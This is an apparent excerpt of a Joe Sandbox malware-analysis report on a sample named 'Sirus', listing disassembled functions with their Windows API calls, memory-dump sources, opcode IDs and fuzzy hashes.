                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 05398651
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979107600.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5390000_Sirus.jbxd
                                                    Similarity
                                                    • API ID: CreateWindow
                                                    • String ID: U
                                                    • API String ID: 716092398-3372436214
                                                    • Opcode ID: f65b63fb7315d9c1aeaada5ccd330217b04c6efaaa2605049cdc992ea2eff09d
                                                    • Instruction ID: 2da95d7529109333dbf7578d514f07bed84c2f4e66afeab05a1773ed3f6749f9
                                                    • Opcode Fuzzy Hash: f65b63fb7315d9c1aeaada5ccd330217b04c6efaaa2605049cdc992ea2eff09d
                                                    • Instruction Fuzzy Hash: 0E719BB4D04258DFDF20CFA9C984B9EFBB1BB4A304F1091AAE518A7211D770AA85CF45
                                                    Function 05E180F0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 135windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • PostMessageW.USER32(?,?,00000000,?), ref: 05E18213
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979586094.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5e10000_Sirus.jbxd
                                                    Similarity
                                                    • API ID: MessagePost
                                                    • String ID: U
                                                    • API String ID: 410705778-3372436214
                                                    • Opcode ID: 6f9ad9374518e30ab92f5ed8e7aee037f05382933a7f8620d05cd40eadd758cb
                                                    • Instruction ID: c48714d80c20c9617436ed574289ba531be766697903fa192e9c869ea8146552
                                                    • Opcode Fuzzy Hash: 6f9ad9374518e30ab92f5ed8e7aee037f05382933a7f8620d05cd40eadd758cb
                                                    • Instruction Fuzzy Hash: EC4147B9D083889FCB11CFA8D841A9DBFF1BB0A300F15A09AE844BB262D3749904CB55
                                                    Function 025BC4D4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 128COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 025BC5D1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1976305200.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_25b0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID: U
                                                    • API String ID: 2289755597-3372436214
                                                    • Opcode ID: a1b64de992d15dede539d58c657714f2131e1b8146d2c37abc2d1a7cd8a7e2d3
                                                    • Instruction ID: 630b108e20ee9531e910e015c766888e254acea8c872b47329c10e3842e5c991
                                                    • Opcode Fuzzy Hash: a1b64de992d15dede539d58c657714f2131e1b8146d2c37abc2d1a7cd8a7e2d3
                                                    • Instruction Fuzzy Hash: C351D4B1D002198FDB21DFA8C841BDEBBF5BF49304F1084AAD509BB251DB716A89CF95
                                                    Function 05E196E8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 05E197DB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979586094.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5e10000_Sirus.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: U
                                                    • API String ID: 3850602802-3372436214
                                                    • Opcode ID: 2a3249c52a541ca430250b4bbff472f88702d14c7419906b1c152829dc6ddcc8
                                                    • Instruction ID: f7779be6bcdfc32477a94b64b3ff53eda4e18b282871510a3d2061a7662caf62
                                                    • Opcode Fuzzy Hash: 2a3249c52a541ca430250b4bbff472f88702d14c7419906b1c152829dc6ddcc8
                                                    • Instruction Fuzzy Hash: E3410275D042489FCB10CFA9D484ADEBBF5FF49310F24905AE819A7311D731A945CF94
                                                    Function 025BB030 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 126COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 025BC5D1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1976305200.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_25b0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID: U
                                                    • API String ID: 2289755597-3372436214
                                                    • Opcode ID: 3191404dcd6460a29c25c46a04075d1c83684e7cd15becd9f4484d2a588ddf01
                                                    • Instruction ID: 298cf8a9eed15a23d80dd337a64e9520430f652979c995d54427a8721679ba45
                                                    • Opcode Fuzzy Hash: 3191404dcd6460a29c25c46a04075d1c83684e7cd15becd9f4484d2a588ddf01
                                                    • Instruction Fuzzy Hash: D551E5B0D002198FDB21DFA8C841BDEBBF5BF49304F1084AAD519BB251DB716A89CF95
                                                    Function 05E1A30B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 117COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetClassInfoW.USER32(?,?,?), ref: 05E1A418
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979586094.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5e10000_Sirus.jbxd
                                                    Similarity
                                                    • API ID: ClassInfo
                                                    • String ID: U
                                                    • API String ID: 3534257612-3372436214
                                                    • Opcode ID: 8afe9a81fd62aca38af47e14a9bac3032724d9618250f2446300ccc583911ff4
                                                    • Instruction ID: 06ac0dd081b3fa17ba4b67d08d7215232a041214a211083d03ae268a799d0780
                                                    • Opcode Fuzzy Hash: 8afe9a81fd62aca38af47e14a9bac3032724d9618250f2446300ccc583911ff4
                                                    • Instruction Fuzzy Hash: 3351DDB4D093988FDB01CFA9C488A9DBFF1BF09314F1480AAE858AB251D334A945CF55
                                                    Function 05E1A340 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetClassInfoW.USER32(?,?,?), ref: 05E1A418
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979586094.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5e10000_Sirus.jbxd
                                                    Similarity
                                                    • API ID: ClassInfo
                                                    • String ID: U
                                                    • API String ID: 3534257612-3372436214
                                                    • Opcode ID: b31738fc6da3a5ed89935ce6c2b6f63bfdd7b7a726d5a7899875d42b630d7342
                                                    • Instruction ID: 1e7ff90b8d806e645efe3cf9b88b45c989b422a5cee8c907b6ee71dd5c08cd05
                                                    • Opcode Fuzzy Hash: b31738fc6da3a5ed89935ce6c2b6f63bfdd7b7a726d5a7899875d42b630d7342
                                                    • Instruction Fuzzy Hash: 794188B4D01258DFDB10CFA9D484AEEFBF5BB48314F14902AE858BB250D374AA85CF94
                                                    Function 0539600C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 0539ACC1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979107600.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5390000_Sirus.jbxd
                                                    Similarity
                                                    • API ID: CallProcWindow
                                                    • String ID: U
                                                    • API String ID: 2714655100-3372436214
                                                    • Opcode ID: d551cc9535a838645894287abbf4e3a502316910caadb19e383d548ddb61611b
                                                    • Instruction ID: 6249b9b93f028329784a5d427875eb3971faba338120d9064b9e8b03d7894e57
                                                    • Opcode Fuzzy Hash: d551cc9535a838645894287abbf4e3a502316910caadb19e383d548ddb61611b
                                                    • Instruction Fuzzy Hash: 044119B4900309DFDB18CF99C448AAABBF6FF88314F24C559D519AB361D775A841CFA0
                                                    Function 05E18171 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 88windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • PostMessageW.USER32(?,?,00000000,?), ref: 05E18213
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979586094.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5e10000_Sirus.jbxd
                                                    Similarity
                                                    • API ID: MessagePost
                                                    • String ID: U
                                                    • API String ID: 410705778-3372436214
                                                    • Opcode ID: 0b2573d047128725a5f78719a2ae4c349dcce901787104680b6be3dccb10c8f3
                                                    • Instruction ID: 3a6164e4c407d61f1ac9e2c9e2ecd0a03a3ef5822410b394294b450635f27fe4
                                                    • Opcode Fuzzy Hash: 0b2573d047128725a5f78719a2ae4c349dcce901787104680b6be3dccb10c8f3
                                                    • Instruction Fuzzy Hash: CD3199B8D042489FCB10CFA9D584ADEFBF5BB09310F14A01AE818BB310D735A945CFA5
                                                    Function 05E1229C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 88windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • PostMessageW.USER32(?,?,00000000,?), ref: 05E18213
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979586094.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5e10000_Sirus.jbxd
                                                    Similarity
                                                    • API ID: MessagePost
                                                    • String ID: U
                                                    • API String ID: 410705778-3372436214
                                                    • Opcode ID: 15ebdbd7796439ad652cf9f90813e82d0de4e5f82d64ffbb5fc59c00f239d1a9
                                                    • Instruction ID: 74fd14cf48b1cf7e7dd9de6e1971151ee268745fc2ea8c97c9bba2cf71e99e22
                                                    • Opcode Fuzzy Hash: 15ebdbd7796439ad652cf9f90813e82d0de4e5f82d64ffbb5fc59c00f239d1a9
                                                    • Instruction Fuzzy Hash: 043177B9D04248AFCB10CFA9D584ADEFBF5AB09310F24A01AE818BB310D735A945CF64
                                                    Function 05E164D1 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 85COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetWindowTextW.USER32(?,?), ref: 05E16576
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979586094.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5e10000_Sirus.jbxd
                                                    Similarity
                                                    • API ID: TextWindow
                                                    • String ID: U
                                                    • API String ID: 530164218-3372436214
                                                    • Opcode ID: 2e464cc07cbb7ad9477777c8df4c903d305273b0996bbdb1d6155fa0b6cd5276
                                                    • Instruction ID: 61862b24b44fcb179f20ad5b98dceee27ef4185fc836454ca19a534f47745f45
                                                    • Opcode Fuzzy Hash: 2e464cc07cbb7ad9477777c8df4c903d305273b0996bbdb1d6155fa0b6cd5276
                                                    • Instruction Fuzzy Hash: 0531BBB9C01218DFCB10CFA9D984ADEFBF1BB49314F14946AE858B7320D334AA45CB54
                                                    Function 05E164D8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 82COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetWindowTextW.USER32(?,?), ref: 05E16576
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979586094.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5e10000_Sirus.jbxd
                                                    Similarity
                                                    • API ID: TextWindow
                                                    • String ID: U
                                                    • API String ID: 530164218-3372436214
                                                    • Opcode ID: 2025ec9e89c51083d60eedeae0de5de01d3b7d7598c67454704cbd2b2e757795
                                                    • Instruction ID: ccc67d2f17c235541db5bfa67b0f3b01675cfb7155676eec6d6f894def9df36d
                                                    • Opcode Fuzzy Hash: 2025ec9e89c51083d60eedeae0de5de01d3b7d7598c67454704cbd2b2e757795
                                                    • Instruction Fuzzy Hash: 8331AAB5D012189FCB10CFA9D984ADEFBF5BB49314F14906AE858B7360D334AA45CF64
                                                    Function 05395EF4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 77COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetWindowLongW.USER32(?,?,?), ref: 05398846
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979107600.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5390000_Sirus.jbxd
                                                    Similarity
                                                    • API ID: LongWindow
                                                    • String ID: U
                                                    • API String ID: 1378638983-3372436214
                                                    • Opcode ID: 7b7850ad050a6d37e77e554ba08cd9d72bf6fe97a74a2f519a927d0a5ef406b1
                                                    • Instruction ID: 71dad245e22d00589b87cdaa2de6dc7f7eb32c2ba0dfe86fa67e468fca16f71e
                                                    • Opcode Fuzzy Hash: 7b7850ad050a6d37e77e554ba08cd9d72bf6fe97a74a2f519a927d0a5ef406b1
                                                    • Instruction Fuzzy Hash: 423194B9D05218AFCB10CFA9D984ADEFBF5FB49310F10906AE818B7310D375A9458FA4
                                                    Function 053987B0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 76COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetWindowLongW.USER32(?,?,?), ref: 05398846
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979107600.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5390000_Sirus.jbxd
                                                    Similarity
                                                    • API ID: LongWindow
                                                    • String ID: U
                                                    • API String ID: 1378638983-3372436214
                                                    • Opcode ID: 7fd3d5b2e1daa30c64fd095ca5b4ac27cab30a3202c6464e123ed880c3a5429d
                                                    • Instruction ID: e2e6697703d93404f0bda21c7f72033e81ba1e7251b7c34c660d19560c68aeb5
                                                    • Opcode Fuzzy Hash: 7fd3d5b2e1daa30c64fd095ca5b4ac27cab30a3202c6464e123ed880c3a5429d
                                                    • Instruction Fuzzy Hash: D63196B9D052189FCB10CFA9D984ADEFBF5FB49310F24906AE819B7310D375A9058F64
                                                    Function 076D9A28 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 69COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetConsoleWindow.KERNELBASE ref: 076D9AA0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1980241888.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_76d0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID: ConsoleWindow
                                                    • String ID: U
                                                    • API String ID: 2863861424-3372436214
                                                    • Opcode ID: 67ccd4d9cdaafbf50fa583eab2ac1d78149c955036f5dc48e7a105671557f553
                                                    • Instruction ID: 16625a57cb249a2aff82255afb45634838e77802d056e597a079a0bdaa80b1f6
                                                    • Opcode Fuzzy Hash: 67ccd4d9cdaafbf50fa583eab2ac1d78149c955036f5dc48e7a105671557f553
                                                    • Instruction Fuzzy Hash: F321ECB5D002088FCB10CFA9D584ADEFBF4EB49324F24841AD419B3240C735A945CFA4
                                                    Function 076D9A30 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetConsoleWindow.KERNELBASE ref: 076D9AA0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1980241888.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_76d0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID: ConsoleWindow
                                                    • String ID: U
                                                    • API String ID: 2863861424-3372436214
                                                    • Opcode ID: b463cb29bfdf5dccc8c8627a882159e35cc4cdac34f39c2a728105a331f721f3
                                                    • Instruction ID: a37665339bc119d7e9f0b9930cb55f260bc4b98d534a50a3f249e8e96986eb41
                                                    • Opcode Fuzzy Hash: b463cb29bfdf5dccc8c8627a882159e35cc4cdac34f39c2a728105a331f721f3
                                                    • Instruction Fuzzy Hash: 5421DCB5D002088FCB10CFA9D584ADEFBF4EB48324F24942AD419B3340C735A945CFA4
                                                    Function 05BFC89C Relevance: 2.6, Strings: 2, Instructions: 147COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (bq$U
                                                    • API String ID: 0-2540135491
                                                    • Opcode ID: 99928211665c8ceeedd0ee5f8f1908e61ce09adfd351f7e221cf5fb907080d39
                                                    • Instruction ID: 48956f07733439502cd38cb170a8264cdf369fcd61ad23a8ccdda133b48f2fea
                                                    • Opcode Fuzzy Hash: 99928211665c8ceeedd0ee5f8f1908e61ce09adfd351f7e221cf5fb907080d39
                                                    • Instruction Fuzzy Hash: 125133B4E052489FCB04DFA9D484AAEFFF1FF89300F14846AE519A7251DB34A949CF51
                                                    Function 05E1A2D7 Relevance: 1.6, APIs: 1, Instructions: 123COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetClassInfoW.USER32(?,?,?), ref: 05E1A418
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979586094.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5e10000_Sirus.jbxd
                                                    Similarity
                                                    • API ID: ClassInfo
                                                    • String ID:
                                                    • API String ID: 3534257612-0
                                                    • Opcode ID: 0818ac5708a9abc939ce6d29ea7953e112c396bcee88cfed2087dd8675a93a49
                                                    • Instruction ID: 7845f644093fb2721afc7104f4c67aa566cfc4975bdbf2a0c02e03f412bdc905
                                                    • Opcode Fuzzy Hash: 0818ac5708a9abc939ce6d29ea7953e112c396bcee88cfed2087dd8675a93a49
                                                    • Instruction Fuzzy Hash: 9551CBB5D05219CFDB00CFA9D488AEDFBF1BF49314F14906AE858AB211D335A986CF94
                                                    Function 05BFA848 Relevance: 1.4, Strings: 1, Instructions: 186COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: U
                                                    • API String ID: 0-3372436214
                                                    • Opcode ID: ccc81e4e76e89e3d3c1c7204a7597e4441fb3d49f4a0a77af835a5e1f884b3bd
                                                    • Instruction ID: 222ef1df0691ef05d31b94ce7f96a27a23b10ec53a8c95e634d1d8af7f46540d
                                                    • Opcode Fuzzy Hash: ccc81e4e76e89e3d3c1c7204a7597e4441fb3d49f4a0a77af835a5e1f884b3bd
                                                    • Instruction Fuzzy Hash: 946118B5E002599FCB14DFA9C848AAEBFF6FF88300F14846AE515E7350DB34A905CB90
                                                    Function 05BFB024 Relevance: 1.4, Strings: 1, Instructions: 140COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: U
                                                    • API String ID: 0-3372436214
                                                    • Opcode ID: 7246096a475daaad9bfc89f25a02632e3539d7e31293244256eddd10a2bd1d7b
                                                    • Instruction ID: 121e8442c7f973e6bc612ab7385787646b998590ad2ea0e3adfd25decf16ed83
                                                    • Opcode Fuzzy Hash: 7246096a475daaad9bfc89f25a02632e3539d7e31293244256eddd10a2bd1d7b
                                                    • Instruction Fuzzy Hash: D751B2B1D002198FDB10DFA9C984ADEBBF5FF49300F2095A9D509BB211DB71AA49CF94
                                                    Function 05BFB91C Relevance: 1.4, Strings: 1, Instructions: 140COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: U
                                                    • API String ID: 0-3372436214
                                                    • Opcode ID: 49ab5b0e9fa74b6e7ea26f7ac09cb7a9fbb9056b60587822246151c9507d31fc
                                                    • Instruction ID: 7e8076a409aa465928f9961c8d608eab778fad8a9dcd49528e363a0ae382ac81
                                                    • Opcode Fuzzy Hash: 49ab5b0e9fa74b6e7ea26f7ac09cb7a9fbb9056b60587822246151c9507d31fc
                                                    • Instruction Fuzzy Hash: BB51B3B1D002198FDB10DFA9C980ADEBBF5FF49300F2095A9D509BB251DB71AA49CF94
                                                    Function 05BFA83C Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: U
                                                    • API String ID: 0-3372436214
                                                    • Opcode ID: 3041bd844f039b258cc1dcb5ce4981d76ebebc8e2c1e58f58c1318c04bc66ef6
                                                    • Instruction ID: c9e9f8188fdc16e085e704a972fe7a69f835b48a04f7f3dc6320882defe7aa28
                                                    • Opcode Fuzzy Hash: 3041bd844f039b258cc1dcb5ce4981d76ebebc8e2c1e58f58c1318c04bc66ef6
                                                    • Instruction Fuzzy Hash: 73419BB4D00348DFCB24CFA9C984ADDFBB1BB09304F20916AE428BB251DB75A949CF55
                                                    Function 05BF8268 Relevance: 1.4, Strings: 1, Instructions: 102COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Hbq
                                                    • API String ID: 0-1245868
                                                    • Opcode ID: 62a5c41d06c63deaad21e20ab9feceb50c54d520eea182265f2f19a4fb37b372
                                                    • Instruction ID: 3529c360c630fa74a509218c4c61ed76dbfabe06e60982142cdb66b343cef21e
                                                    • Opcode Fuzzy Hash: 62a5c41d06c63deaad21e20ab9feceb50c54d520eea182265f2f19a4fb37b372
                                                    • Instruction Fuzzy Hash: 35310A74A10209AFDB09AFA4D8559AEBFB7FFC9300F108559F502AB350DF34A945DB81
                                                    Function 05BFB820 Relevance: 1.3, Strings: 1, Instructions: 80COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: mKI
                                                    • API String ID: 0-2747526811
                                                    • Opcode ID: 323ac64cf03ef98734bd0a8a01087a67f16faf9a6c3190caf5391dd607210151
                                                    • Instruction ID: 3d88bbc6536a96769c9f142a4236cc3e736c3f4721b66104d6ac02c9948dc9ae
                                                    • Opcode Fuzzy Hash: 323ac64cf03ef98734bd0a8a01087a67f16faf9a6c3190caf5391dd607210151
                                                    • Instruction Fuzzy Hash: 0E21E2B5B002048FC715EF79C4444AABBE6FFC8305B1588A9E6069B351EF71FD0A8B91
                                                    Function 05BFB469 Relevance: 1.3, Strings: 1, Instructions: 79COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: U
                                                    • API String ID: 0-3372436214
                                                    • Opcode ID: e92edfe46cfcc91837412c8b81ae2a00aededabd400a9ec7c116ef9d848c92a2
                                                    • Instruction ID: 4b33c00b94319cfb0bbdbfdad9f2e3c78f3126ffe9f17146542817c364173c39
                                                    • Opcode Fuzzy Hash: e92edfe46cfcc91837412c8b81ae2a00aededabd400a9ec7c116ef9d848c92a2
                                                    • Instruction Fuzzy Hash: 4631B7B9D05218AFCB10CFA9D984A9EFBF4FB49310F14806AE818B7310D374A904CFA5
                                                    Function 05BFB46C Relevance: 1.3, Strings: 1, Instructions: 78COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: U
                                                    • API String ID: 0-3372436214
                                                    • Opcode ID: 1051e8a8a2886e1ebb785b78bc613acac8a33a0d8eae2f9e3f15ee12638195fb
                                                    • Instruction ID: 7b29dfb97c2b902c2e1cf5f866901ffbdf753e894fce2998ba463752046b2e17
                                                    • Opcode Fuzzy Hash: 1051e8a8a2886e1ebb785b78bc613acac8a33a0d8eae2f9e3f15ee12638195fb
                                                    • Instruction Fuzzy Hash: 1E31C7B9D01218AFCB10CFA9D984A9EFBF4FB49310F10806AE918B7310D374A904CFA4
                                                    Function 05BFB060 Relevance: 1.3, Strings: 1, Instructions: 78COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: U
                                                    • API String ID: 0-3372436214
                                                    • Opcode ID: 0515e76ab9d7dc6963d9c206df922a7fde3d34a3cf69f6ccc6e79527df9acc57
                                                    • Instruction ID: 45e46c6d97ade3ef6bbdf01855d2d19d6b008bf1e48a7854b7a8b02435379b75
                                                    • Opcode Fuzzy Hash: 0515e76ab9d7dc6963d9c206df922a7fde3d34a3cf69f6ccc6e79527df9acc57
                                                    • Instruction Fuzzy Hash: 1C31C7B9D01218AFCB10CFA9D984A9EFBF4FB49310F10806AE818B7310D334A904CFA4
                                                    Function 05BFBF18 Relevance: 1.3, Strings: 1, Instructions: 75COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: U
                                                    • API String ID: 0-3372436214
                                                    • Opcode ID: 813431ba04fbd9e100e41eb50a8b4c8d7f1d374ac02613e3fdba5b802253e9d2
                                                    • Instruction ID: 2d03823277fe40ae3f779345841a3e506e8c91915e354c1a7620d9335581e5b4
                                                    • Opcode Fuzzy Hash: 813431ba04fbd9e100e41eb50a8b4c8d7f1d374ac02613e3fdba5b802253e9d2
                                                    • Instruction Fuzzy Hash: 4D3184B9D01218AFCB10CFA9D984A9EFBF5BB49320F14906AE918B7310D335A945CF64
                                                    Function 05BFB810 Relevance: 1.3, Strings: 1, Instructions: 60COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: mKI
